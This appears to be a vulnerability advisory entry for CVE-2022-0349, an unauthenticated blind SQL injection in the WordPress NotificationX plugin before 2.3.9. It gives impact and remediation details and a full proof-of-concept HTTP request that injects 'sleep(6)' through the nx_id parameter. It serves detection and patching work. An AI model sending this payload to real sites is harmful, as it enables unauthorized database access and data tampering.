| Title | WordPress NotificationX <2.3.9 - SQL Injection |
|---|---|
| Author | edoardottt |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. |
| Remediation | Update to the latest version of the WordPress NotificationX plugin (2.3.9 or higher) to mitigate the SQL Injection vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.58573 |
| CVE ID | CVE-2022-0349 |
| CWE ID | CWE-89 |
| Tags | time-based-sqli cve cve2022 wordpress wp-plugin wp sqli notificationx wpscan wpdeveloper vuln |
WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
nx_id=sleep(6) -- x
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0349.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-0349.pcap
N/AN/A